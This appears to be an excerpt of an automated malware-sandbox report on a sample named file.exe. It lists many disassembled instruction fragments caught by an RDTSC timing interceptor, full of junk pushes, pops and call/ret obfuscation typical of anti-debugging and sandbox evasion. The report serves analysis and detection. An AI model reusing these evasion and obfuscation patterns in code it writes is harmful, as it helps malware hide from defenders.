Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D99E second address: 97D9C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FA441297133h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D9C2 second address: 97D9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D9C7 second address: 97DA0D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA441297128h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or dx, 30C6h 0x00000010 lea ebx, dword ptr [ebp+124514ADh] 0x00000016 mov ecx, dword ptr [ebp+122D3649h] 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FA441297132h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 jmp 00007FA441297130h 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 990709 second address: 99072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343DDh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4407343DEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F57B second address: 99F57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F57F second address: 99F596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FA4407343D6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96F8C2 second address: 96F8ED instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FA44129713Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96F8ED second address: 96F8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96F8F1 second address: 96F912 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA44129712Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d jng 00007FA441297132h 0x00000013 jbe 00007FA441297126h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D582 second address: 99D586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D586 second address: 99D58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D6C4 second address: 99D6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D6C8 second address: 99D6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D826 second address: 99D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D9A3 second address: 99D9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA441297130h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D9B7 second address: 99D9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DAFA second address: 99DAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DAFE second address: 99DB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DC4F second address: 99DC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA441297126h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DC5A second address: 99DC6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DDh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DF0D second address: 99DF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99DF11 second address: 99DF20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E31F second address: 99E323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96C299 second address: 96C2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA4407343D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E751 second address: 99E755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E755 second address: 99E76B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FA4407343DCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99E76B second address: 99E770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99EE75 second address: 99EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA4407343E8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99EE94 second address: 99EEC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA441297138h 0x00000008 jmp 00007FA44129712Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F003 second address: 99F008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F008 second address: 99F00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F3C3 second address: 99F3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FA4407343D6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F3D1 second address: 99F3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99F3D5 second address: 99F3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A3665 second address: 9A366C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A9FF1 second address: 9A9FF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA173 second address: 9AA19F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297139h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA44129712Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA34A second address: 9AA359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA4C6 second address: 9AA4CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA9EB second address: 9AA9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA9EF second address: 9AA9F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AA9F3 second address: 9AAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA4407343E9h 0x0000000d push ecx 0x0000000e jg 00007FA4407343D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB294 second address: 9AB29A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB29A second address: 9AB29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB29E second address: 9AB2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB667 second address: 9AB66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB66B second address: 9AB671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AB671 second address: 9AB675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ABF89 second address: 9ABF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ABF8D second address: 9ABF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC2F5 second address: 9AC2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC40B second address: 9AC415 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA4407343DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC548 second address: 9AC590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA44129712Dh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+1245657Bh], ebx 0x00000014 call 00007FA441297131h 0x00000019 call 00007FA441297130h 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop esi 0x00000021 pop esi 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC590 second address: 9AC596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC596 second address: 9AC59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC59C second address: 9AC5AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD3CC second address: 9AD3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD2DF second address: 9AD2E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD3D0 second address: 9AD3EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297134h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD2E5 second address: 9AD2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE49E second address: 9AE4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA441297130h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9ADCE1 second address: 9ADCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEBB3 second address: 9AEBBD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA44129712Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEDA0 second address: 9AEDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEDA4 second address: 9AEE30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA441297137h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FA441297131h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FA441297128h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D32BEh], ecx 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 jmp 00007FA441297139h 0x0000003e jbe 00007FA441297128h 0x00000044 push eax 0x00000045 pop eax 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FA441297128h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AF763 second address: 9AF7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a and di, 2039h 0x0000000f popad 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FA4407343D8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e call 00007FA4407343DFh 0x00000033 sbb di, C142h 0x00000038 pop esi 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push edx 0x0000003e pop edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AF7B7 second address: 9AF7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AF7BC second address: 9AF7E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA4407343DFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4DC3 second address: 9B4DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA44129712Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4DD4 second address: 9B4DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343DAh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007FA4407343D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 972DA4 second address: 972DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B1ECD second address: 9B1ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA4407343D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D7E second address: 9B6D83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D83 second address: 9B6DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FA4407343DDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B99E0 second address: 9B99E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B99E6 second address: 9B9A70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FA4407343D6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f stc 0x00000010 call 00007FA4407343E2h 0x00000015 add ebx, 3036D7BFh 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FA4407343D8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FA4407343D8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, dword ptr [ebp+122D17B4h] 0x0000005a xchg eax, esi 0x0000005b jmp 00007FA4407343DBh 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007FA4407343D6h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B9A70 second address: 9B9A7E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B8D1B second address: 9B8D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B8D1F second address: 9B8D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BAA7A second address: 9BAA83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B8D23 second address: 9B8D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B8D33 second address: 9B8D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BB9AA second address: 9BB9F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA44129712Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D3651h] 0x00000013 push 00000000h 0x00000015 call 00007FA44129712Bh 0x0000001a mov ebx, 76D8672Eh 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 jno 00007FA44129712Ch 0x00000028 or dword ptr [ebp+124501A2h], ebx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BB9F0 second address: 9BB9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA4407343D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BB9FB second address: 9BBA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B9B92 second address: 9B9C1F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4407343D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FA4407343DAh 0x00000012 mov bx, 8A00h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d sub dword ptr [ebp+124505A6h], ecx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov dword ptr [ebp+122D5265h], ecx 0x00000030 mov eax, dword ptr [ebp+122D022Dh] 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FA4407343D8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1C6Fh], edx 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push esi 0x0000005b call 00007FA4407343D8h 0x00000060 pop esi 0x00000061 mov dword ptr [esp+04h], esi 0x00000065 add dword ptr [esp+04h], 0000001Dh 0x0000006d inc esi 0x0000006e push esi 0x0000006f ret 0x00000070 pop esi 0x00000071 ret 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B9C1F second address: 9B9C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BCA88 second address: 9BCB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA4407343E1h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d jbe 00007FA4407343E7h 0x00000013 jmp 00007FA4407343E1h 0x00000018 pop ecx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FA4407343D8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FA4407343D8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 movsx edi, si 0x00000053 xor dword ptr [ebp+1244EDC4h], ebx 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c pushad 0x0000005d jmp 00007FA4407343E4h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
